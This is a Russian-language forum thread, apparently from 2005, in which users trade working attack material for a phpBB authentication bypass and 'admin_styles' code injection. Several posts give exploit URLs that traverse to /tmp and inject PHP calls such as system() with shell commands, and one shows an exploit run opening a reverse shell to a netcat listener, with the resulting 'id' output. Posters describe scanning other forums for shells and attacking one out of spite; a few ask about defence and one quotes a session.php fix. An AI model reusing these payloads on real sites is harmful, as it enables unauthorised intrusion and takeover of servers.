phpBB User id Auth. Bypass and "admin

phpBB User id Auth. Bypass and "admin_styles" Code Inject...

Shanker мастер Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003 всего лишь человек...	#41 Это нравится:0 Да/0 Нет 18.03.2005 09:40:41 Хм... стиль на форуме сплоит он создал, тока толку от него? Не пашет... "Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

temp

Guest

#42

Это нравится:0 Да/0 Нет

18.03.2005 11:14:52

Цитата
Sark пишет: лучше скажите что и где поменять чтобы дыру закрыть

Как я понял сплоит эксплуатирует недавно найденую уязвимость с подделкой куки. Профиксить эту багу и все.
Эх жаль что раньше этого сплойта не было [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG] Я над одним форумом только поприкалывался (там админы меня достали). Еслибы раньше этот сплоит...

Sark Guest	#43 Это нравится:0 Да/0 Нет 18.03.2005 13:44:39 Получается ничего нового не придумали, просто используют для другой цели старую дыру?

][лам Guest	#44 Это нравится:0 Да/0 Нет 18.03.2005 14:33:25 нет еще шелл даеца =) кстати неткатом еобязательно пользоваться... http://www..ru/phpBB2/admin/admin_styles.php?mode=addnew&in stall_to=../../../. ./../../../../../../../../../../../../../../../tmp&nigga=php info()<= СЮДА СМОТРЕТЬ;&sid=**

Sark Guest	#45 Это нравится:0 Да/0 Нет 18.03.2005 14:48:12 Ну если куку не подделаешь, то и шелла не будет же... Ведь с неправильным id форум не примет ничего...

][лам Guest	#46 Это нравится:0 Да/0 Нет 18.03.2005 15:15:07 из браузера все куки гадо удалить...

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

#47

Это нравится:0 Да/0 Нет

18.03.2005 17:56:47

Кто-нить уже получил шелл? Да хотя бы инфу про php?
У меня вебсервер ругается ошибками:
Parse error: parse error, unexpected T_STRING in /tmp/theme_info.cfg(8) : eval()d code on line 1

или

Warning: main(): open_basedir restriction in effect. File(./../templates/../../../../../../../../../../../../../. ./../../../../../tmp/theme_info.cfg) is not within the allowed path(s): (/home/****:/usr/local/enn/datapalm-php-module/lib:/bin:/sbi n:/usr/bin) in /home/****/www/forum/phpBB2/admin/admin_styles.php on line 74

If you beleive that this error is due to the server configuration problems please contact your local web-hosting support team.

Кстати, in stall_to - это вроде неправильно должно быть вместе: install_to

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

#48

Это нравится:0 Да/0 Нет

18.03.2005 19:08:17

][лам
Ты сам-то шелл получал?

Цитата
из браузера все куки гадо удалить..

Если куки удалишь то нифига не пустит на форум, даже с указанным sid

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Barsik

Guest

#49

Это нравится:0 Да/0 Нет

18.03.2005 19:50:37

Цитата
][лам пишет: нет еще шелл даеца =) кстати неткатом еобязательно пользоваться... http://www..ru/phpBB2/admin/admin_styles.php?mode=addnew&in stall_to=../../../. ./../../../../../../../../../../../../../../../tmp&nigga=php info()<= СЮДА СМОТРЕТЬ;&sid=**

И какой код ты собрался туда вставлять ?

Barsik

Guest

#50

Это нравится:0 Да/0 Нет

18.03.2005 19:54:31

Цитата

Shanker пишет:
][лам
Ты сам-то шелл получал?

Цитата
из браузера все куки гадо удалить..

Если куки удалишь то нифига не пустит на форум, даже с указанным sid

Все пустит , удаляю булки перед вставкой этого пути , потом
использую второй линк подставляя /admin/index.php в
http://site.com/phpBB/<сюда>?sid=d0ea0713071d287eefb7f f15d0d7c5e1

Все отлично работает , но это не интерестно , а с шелами пока не получается

][лам Guest	#51 Это нравится:0 Да/0 Нет 18.03.2005 22:25:45 получал... http://www..ru/phpBB2/admin/admin_styles.php?mode=addnew&in stall_to=../../../. ./../../../../../../../../../../../../../../../tmp&nigga=sys tem(fuck);&fuck=ls -la&sid=**

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

#52

Это нравится:0 Да/0 Нет

19.03.2005 00:02:17

Barsik
С кодом не проблема. Про это в других темах разжёвано

Насчёт: пустит.... Меня вот не пускает, хотя делал в точности как ты описываешь [IMG]http://www.securitylab.ru/forum/smileys/smiley5.gif[/IMG]

][лам
Хм... я пропарсил где-то с десяток форумов и ни один мне шелл не дал, тока ошибкими ругался [IMG]http://www.securitylab.ru/forum/smileys/smiley11.gif[/IMG]

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Barsik

Guest

#53

Это нравится:0 Да/0 Нет

19.03.2005 00:58:12

phpbbexp.exe

C:\phpbbexp.exe http://site.com/phpbb2/ 13.37.13.37 8888
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperз ... 06bef5092f9d369f13107684f63a3499 http://site.com/phpbb2/?sid=06bef5092f9d369f13107684f63a3499
_ recuperation du nom de la table sql ... sempervi OK
_ Injection de la fake templates ...OK
_ Fichier crзe

C:\nc -lvvp 8888
listening on [any] 8888 ...
connect to [13.37.13.37] from site.com [0.6.6.6] 57532
id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

PS: nc - netcat net sniffer

Barsik Guest	#54 Это нравится:0 Да/0 Нет 19.03.2005 01:01:07 Вместо: nc -lvvp 8888 Лучше так: nc -vvp 13.13.13.13 8888

Oleg_

Guest

#55

Это нравится:0 Да/0 Нет

19.03.2005 02:54:11

Врубаю неткат nc -lvvp 888
Запускаю сплоит C:\phpbbexp.exe http://site.com/phpbb2/ 11.11.11.11 888
Все работает, кроме того, что к неткату нет подключений, файерволлов и т.д. никаких нет само собой. в чем трабл, подскажите пожалуйста.

Domenus

Guest

#56

Это нравится:0 Да/0 Нет

19.03.2005 12:56:18

Кошмар! не могу удержаться и не написать... Какого сюда суеться ламьё всякое, которое даже не знает, что такое nc или open_basedir restriction ??
Тем ребятам, которые смогли заюзать сами - респект... Только народ, не стоит сильно разжевывать для киддисов... а то точно ни одного форума живого не останеться...
Сорри за оффтоп...

cr4sh

Guest

#57

Это нравится:0 Да/0 Нет

19.03.2005 15:19:19

Цитата
The fix is quite simple, add $userdata[user_level] = USER; after every $userdata[user_id] = ANONYMOUS; in session.php

http://www.securityfocus.com/archive/1/392481

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

#58

Это нравится:0 Да/0 Нет

19.03.2005 16:32:28

cr4sh
Что-то подобное дня 4 назад читал на www.security.nnov.ru

][лам
Да куки не установлены даже! Я сплоит exe-шный юзал
Кстати, ты сплоит сам компилил или в инете нашёл? Я очень сомневаюбсь что есть между этим разница, но всё-таки?
Насчёт highlight=%2527. - это пройденный этап. Тот форум 2.0.3 - это просто для проверки этого сплоита

Цитата
Ошибки на самом деле частые, почему не понятно..

А! Я-то думал, у тебя и дуригих всё везде работает, а у меня всё не так

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

rav3n Guest	#59 Это нравится:0 Да/0 Нет 19.03.2005 18:34:43 сплоит работает на ура! Респект автору!

Lamer Guest	#60 Это нравится:0 Да/0 Нет 19.03.2005 18:51:09 Кто нибудь может сказать как защититься или ссылкой на объяснение какое этой баги угостить.... P.S. Не вижу ничего страшного в коде этого сплойта, простые попытки обращения к страницам форума, в которых для успешного выполнения операций нужен правильный id...Как кто то сказал, все основывается на старой баге с подделкой куки? И что, а если эта старая бага уже залатана, то ничего страшного этот сплойт не делает???

Читают тему

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?